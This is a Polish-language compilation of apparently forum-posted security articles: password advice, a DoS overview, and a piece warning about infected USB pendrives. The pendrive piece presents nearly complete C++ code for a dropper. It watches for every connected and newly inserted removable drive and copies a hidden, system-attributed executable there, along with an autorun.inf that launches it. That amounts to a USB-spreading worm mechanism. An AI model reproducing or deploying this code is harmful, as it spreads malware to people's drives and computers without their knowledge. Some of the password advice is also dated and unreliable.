konfigurację aplikacji, urządzeń czy serwerów. autorzy: Thane kontakt: thane (na) tlen.pl
  4. Najważniejsze zasady tworzenia bezpiecznych haseł. STOSUJ DŁUGIE HASŁA Im dłuższe jest hasło, tym trudniej je złamać. Do ochrony ważnych zasobów nie stosuj haseł krótszych niż 8-znakowe. UŻYWAJ RÓŻNYCH ZNAKÓW Używanie haseł typu "111 111" to kiepski pomysł, bo algorytmy łamiące świetnie sobie radzą z powtarzającymi się znakami. Hasło powinno się składać z różnego typu znaków: liter (małych i dużych), cyfr, znaków interpunkcyjnych i innych znaków specjalnych. Im większego zasobu znaków używasz, tym krótsze może być hasło. FRAZY ZAMIAST JEDNOWYRAZOWYCH HASEŁ Jeżeli system uwierzytelniania umożliwia umieszczanie znaków spacji w haśle, stosuj jako hasła całe zdania. Łatwiej zapamiętasz, i wzmocnisz hasło. UNIKAJ NASTĘPUJĄCYCH DZIAŁAŃ: - Regularnej zamiany znaków alfabetu łacińskiego w znaki specjalne (np. każdej litery "a" w "@". Nie używaj jako haseł daty urodzenia, numeru dowodu czy paszportu, numeru pesel itp. - Nie stosuj wyrazów z obcego języka. Zaawansowane narzędzia do łamania haseł korzystają z tzw. metody słownikowej. Nie pomoże też napisanie hasła wspak. - Zawsze używaj więcej niż jednego hasła. W przeciwnym razie złamanie jednego hasła udostępni agresorowi wszystkie twoje chronione tym hasłem zasoby. - Nie korzystaj z usług online przeznaczonych do zarządzania hasłami. Powierzasz wtedy swoje chronione zasoby serwisowi, który nie podlega twojej kontroli. -Choć sami proponujemy korzystanie z menedżera haseł, KeePass Password Safe, odradzamy poszukiwanie tego typu oprogramowania na własną rękę. Proponowane przez nas narzędzie jest sprawdzone i uznane przez ekspertów za rzetelne. Co do innych programów - możesz trafi ć na coś, co będzie wykradało twoje dane. BEZPIECZNIE PRZECHOWUJ HASŁA Zapisanie haseł na zwykłej kartce papieru wcale nie jest złym pomysłem. A już na pewno lepszym niż powierzenie tych haseł jakiemuś "bezpiecznemu" magazynowi haseł online. Oczywiście kartkę z hasłami przechowuj w bezpiecznym miejscu.
  5. Niewiele osób zdaje sobie sprawe jak niebezpieczne jest używanie własnego pendriva w miejscach publicznych takich jak: Biblioteki Kafejki internetowe Szkolna pracownia internetowa.... Tego typu miejsca są wylęgarnią dla wszelkiego typu robactwa, nie znaczy ze mamy nie używać pendrive w takich miejscach, należy tylko zachować pewną ostrożność. Jeśli podłączamy nasz pendrive do naszego komputera po wizycie np. w bibliotece nie włączajmy go klikając na niego 2x lewym przyciskiem myszy gdyż powoduje to włączenie autorunu i infekcje naszego komputera o ile pendrive jest zarażony, dużo lepszym wyjściem jest kliknąć na niego prawym przyciskiem myszy i kliknąć otwórz- wtedy autorun się nie uruchomi. Pyzatym należy włączyć pokazywanie plików ukrytych i systemowych naszym systemie. Robimy to przez klikniecie na Narzędzia -> Opcje folderów -> Widok. Zaznaczamy tam Pokaż ukryte pliki i foldery a także odznaczamy Ukryj chronione pliki systemu windows Od teraz będziemy widzieć pliki, które ktoś umieścił na naszym pendrive bez naszej wiedzy i zgody. Pokaże teraz jak łatwo napisać program który po podłączeniu pendrive do PC automatycznie skopiuje na niego autorun + program, aby pokazać, że wcale nie jest to takie trudne i że naprawdę możemy stać się ofiarą takiego ataku. Na początku dołączamy pliki nagłówkowe takie jak: #include <windows.h> #include <string> #include <vector> Napiszmy teraz funkcje która znajdzie wszelkie pendrivy podlaczone do PC void GetPendrives(std::vector<std::string>* pendrives) { char* bufor=new char[1024]; DWORD need=GetLogicalDriveStrings(1024,bufor);//pobieramy litery dyskow if(need > 1024)//jesli bufor jest za maly alokujemy bufor o odpowiedniej dlugosci { delete bufor; bufor=new char[need]; GetLogicalDriveStrings(need,bufor); } int n=need/4; // ilosc dyskow std::string* dyski=new std::string[n]; int i=0; while(i<n) { dyski[i]=(char*)(bufor+(i*4)); i++; } pendrives->clear();//usuwamy wszystko co jest w vectorze i=0; while(i<n) { if(GetDriveType(dyski[i].c_str())==DRIVE_REMOVABLE)//sprawdzamy ktore dyski sa pendrivami { pendrives->push_back(dyski[i]); } i++; } } Teraz czas na inne potrzebne nam funkcje bool FindInVector(const char* str,std::vector<std::string> vec)//funkcja ktora sprawdza czy pojawil sie nowy pendrive { int n=vec.size(); int i=0; while(i<n) { if(vec[i]==str) { return true; } i++; } return false; } bool ExtractExe(char* id, char *filename)//funkcja wypakowujaca plik z zasobow { bool result = false;HRSRC hResource=NULL;hResource = FindResource(GetModuleHandle(NULL),id , RT_RCDATA); if(!hResource) { return result; } if( hResource != NULL ){ HGLOBAL hLoader = LoadResource(NULL,hResource); if( hLoader != NULL ){ byte *data = (byte *)LockResource(hLoader); DWORD len = SizeofResource(NULL,hResource);if( data != NULL && len > 0 ){ HANDLE hFile = CreateFile(filename, GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if( hFile != INVALID_HANDLE_VALUE ){ DWORD written = 0; int write = WriteFile(hFile, data, len, &written, NULL); if( len == written && write == TRUE ) result = true; } CloseHandle(hFile); } UnlockResource(hLoader); } FreeResource(hLoader); } return result; } A ten kod umieszczamy wewnatrz main: std::vector<std::string> vec; GetPendrives(&vec); int i=0; while(i<vec.size()){ //w tym momecie wypakowujemy na wszystkie pendrivy nasz plik //przyjmujemy ze nasz exe ma w zasobach numer 1005 a autorun 1006 std::string exe=vec[i]; std::string autorun=vec[i]; exe+="Start.exe"; autorun+="autorun.inf"; ExtractExe(MAKEINTRESOURCE(1005),(char*)exe.c_str());//wypakowujemy ExtractExe(MAKEINTRESOURCE(1006),(char*)autorun.c_str());//wypakowujemy SetFileAttributes(exe.c_str(),FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);//ustawiamy atrybut ukryty i systemowy SetFileAttributes(autorun.c_str(),FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);//ustawiamy atrybut ukryty i systemowy i++; } std::vector<std::string> tmp; int n=0; i=0; while(1)//nieskonczona petla ktora sprawdza czy nie pojawiły się nowe pendrivy { GetPendrives(&tmp); n=tmp.size(); i=0; while(i<n) { if(!FindInVector(tmp[i].c_str(),vec)) { //w tym momecie wypakowujemy na ten dysk nasz plik //przyjmujemy ze nasz exe ma w zasobach numer 1005 a autorun 1006 std::string exe=tmp[i]; std::string autorun=tmp[i]; exe+="Start.exe"; autorun+="autorun.inf"; ExtractExe(MAKEINTRESOURCE(1005),(char*)exe.c_str());//wypakowujemy ExtractExe(MAKEINTRESOURCE(1006),(char*)autorun.c_str());//wypakowujemy SetFileAttributes(exe.c_str(),FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);//ustawiamy atrybut ukryty i systemowy SetFileAttributes(autorun.c_str(),FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);//ustawiamy atrybut ukryty i systemowy} i++; } vec=tmp; Sleep(10000); } Na koniec do projektu musimy dodać zasoby ale tego już nie będę tu opisywał gdyż można to znaleźć w google Przykładowy plik autorun: [autorun] OPEN=Start.exe shellexecute=Start.exe shell=Auto shellAuto=&Autoplay shellAutocommand=Start.exe Taki plik umieszczamy w zasobach pod numerem 1006 a plik exe, który ma być uruchamiany pod numerem 1005 Mam nadzieje, że artykuł przekonał was do tego aby uważać na swoje pendrivy Autor artykułu: Grzonu (grzonu.com.pl)
  6. "Odmowa usługi (ang. Denial of Service w skrócie DoS) to jedno z zagrożeń, przed którym najtrudniej się ochronić. Nie prowadzi ono do zniszczenia czy ujawnienia danych, lecz raczej do utraty reputacji i korzyści materialnych z powodu blokowania możliwości świadczenia usług lub powodowania dużych opóźnień w dostępnie do nich." Obrona przed tego typu atakami jest niezwykle trudna. DOS wykorzystuje z reguły właściwości protokołu TCP/IP. Najpopularniejszym sposobem wywołania efektu odmowy usługi jest masowe "floodowanie". Oznacza to nic innego jak wysyłanie sporej ilości żądań wywołania serwera/usługi w krótkim odstępie czasu. Połączenia są tak spreparowane, że ich treść ma drugorzędne znaczenie, istotne jest obciążenie samego serwera tak by został skutecznie "zalany" co doprowadza do jego niestabilnej pracy. Innym narzędziem wywołującym omawiany efekt jest tak zwany "landing". Poprzez wykorzystanie specyfiki najpopularniejszego protokołu TCP/IP nawiązuje się połączenie z serwerem, po czym zmusza się go do wywoływania samego siebie. Powoduje to wykonywania nieskończonej pętli, co prowadzi do niedostępności hosta. Istnieje również możliwość wykorzystania jednego ze składowych protokołów TCP/IP -ICMP. Protokół ICMP jest bardziej znany w mowie potocznej jako "ping". Jego głównym przeznaczeniem jest badanie trwałości połączenia pomiędzy dwoma hostami na zasadzie "prośby o echo" oraz "odpowiedzi echa". Znając tą właściwość istnieje możliwość wysłania wielu próśb o echo z wielu hostów jednocześnie. Spowoduje to, iż serwer stanie się niedostępny w momencie niemożliwości wysłania odpowiedzi na żądania echa. Równie niebezpiecznym narzędziem wywołującym niedostępność serwera jest "spam". Technika polega na preparowaniu nagłówków poczty odwołujących się do celu ataku. Po rozesłaniu możliwie jak największej ilości wiadomości elektronicznych, odbiorcy odpowiadają na nią co prowadzi do niemożności realizacji zadań serwera, a w efekcie końcowym do jego ograniczenia. Powyżej zostały opisane najpopularniejsze metody wywołujące niedostępność hosta. Sam atak DOS jest jednym z najpopularniejszych ataków w sieci. Niestety jak do tej pory nie ma jednoznacznej recepty, pozwalającej w jednoznaczny sposób uniknąć tego typu następstw. Co gorsza w Internecie znajduje się wiele, już gotowych aplikacji, które w znacznym stopniu ułatwiają tego typu naruszenia. Powoduje to, że nawet początkujący haker potrafi wyrządzić ogromne straty. Jedyną metodą, która w jakikolwiek sposób potrafi ograniczyć ataki DOS to poważne podejście do konfiguracji routera sieciowego. Należy ograniczyć ruch, który jest generowany przez, niektóre protokoły. Na przykład ICMP, co pozwoli na uniknięcie masowych żądań o odpowiedź echa. Kolejnym ważnym elementem jest stałe monitorowanie ruchu na styku sieci wewnętrznej z zewnętrzną.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie